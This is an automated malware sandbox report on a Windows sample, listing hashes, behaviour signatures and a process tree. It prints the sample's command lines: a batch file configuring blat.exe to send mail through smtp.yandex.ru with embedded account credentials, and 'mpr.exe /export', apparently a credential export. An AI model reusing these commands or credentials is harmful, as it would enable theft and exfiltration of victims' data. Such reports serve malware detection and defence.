Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16/10/2024, 22:51

General

  • Target

    4f73e81d0101de7157f5c2f005fb589d_JaffaCakes118.exe

  • Size

    1.1MB

  • MD5

    4f73e81d0101de7157f5c2f005fb589d

  • SHA1

    0f361bde4d40acccf35047ecb549f9215ca14465

  • SHA256

    e66f7f877023fed0b8fcf763b4c06744f087f32c378e59c143a51e932d176c3e

  • SHA512

    40383084fa3efc0603f187e9e67927b7949f29bb08504fc00dc5b77ea4998edb5da0c7f27fc848468a9459a940e2f0cca4d953e3c3515fddd06639766a95a663

  • SSDEEP

    24576:NnLB6UAKy5FQKBIxV5E+BHB5gaeuJN5qX35:NnN6UE5uO+nv4

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Modifies registry class 21 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4f73e81d0101de7157f5c2f005fb589d_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\4f73e81d0101de7157f5c2f005fb589d_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2696
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6E0C.tmp\1.bat" "
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4104
      • C:\Windows\SysWOW64\PING.EXE
        ping ya.ru -n 5
        3⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:2112
      • C:\Users\Admin\AppData\Local\Temp\6E0C.tmp\blat.exe
        blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u [email protected] -pw ttk2010
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:3092
      • C:\Users\Admin\AppData\Local\Temp\6E0C.tmp\MPR.exe
        mpr.exe /export
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        PID:3892

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\6E0C.tmp\1.bat

          Filesize

          357B

          MD5

          d6b01433eba515a0fbdc965f97b231a7

          SHA1

          ddad62300ccd645f4de785a28288b64b06fe3d51

          SHA256

          e247b236776d88f357989b5a6093a3d0d32500ed27f6359d63f8dc80c8207ce4

          SHA512

          3ae5f753988f4006c641c1ba1506e2695452a8953315878ac964bca326909cf28ee5adacbb291241a179e9c40eb4194319b1ac8921fc62786a7da2a75eb92271

        • C:\Users\Admin\AppData\Local\Temp\6E0C.tmp\MPR.exe

          Filesize

          3.3MB

          MD5

          6faecfac8efa8c166d27b4325249de29

          SHA1

          1069b5203adca80a91aa12512cec93ac1344f277

          SHA256

          ebe91e2a3e9b5ab00c659bf72e8899425522701c0fe48ac905228068565f1967

          SHA512

          179461a31f21e47413226087d2d465ae787739fcc7d0cfb663f94ca69028dee5bbf77ab72c17caad6f72ff556beeefc9f1f29ec52909c710b6b112a29e4f6cc9

        • C:\Users\Admin\AppData\Local\Temp\6E0C.tmp\blat.exe

          Filesize

          112KB

          MD5

          31f84e433e8d1865e322998a41e6d90e

          SHA1

          cbea6cda10db869636f57b1cffad39b22e6f7f17

          SHA256

          aeca4a77d617da84296b5f857b2821333fe4b9663e8df74ef5a25a7882693e5e

          SHA512

          7ae504723b5b140e45af3163d1bfdc5ee0497debafba07cfbf1d2c15147c000be53f4ac8d36d926ed11cf0bb62e9e72f9bcf5d4caf92aa732d942f55834e2be9

        • memory/2696-0-0x0000000000400000-0x0000000000799000-memory.dmp

          Filesize

          3.6MB

        • memory/2696-24-0x0000000000400000-0x0000000000799000-memory.dmp

          Filesize

          3.6MB

        • memory/3892-23-0x0000000000A50000-0x0000000000A51000-memory.dmp

          Filesize

          4KB

        • memory/3892-27-0x0000000000A50000-0x0000000000A51000-memory.dmp

          Filesize

          4KB

        • memory/3892-26-0x0000000000500000-0x000000000084A000-memory.dmp

          Filesize

          3.3MB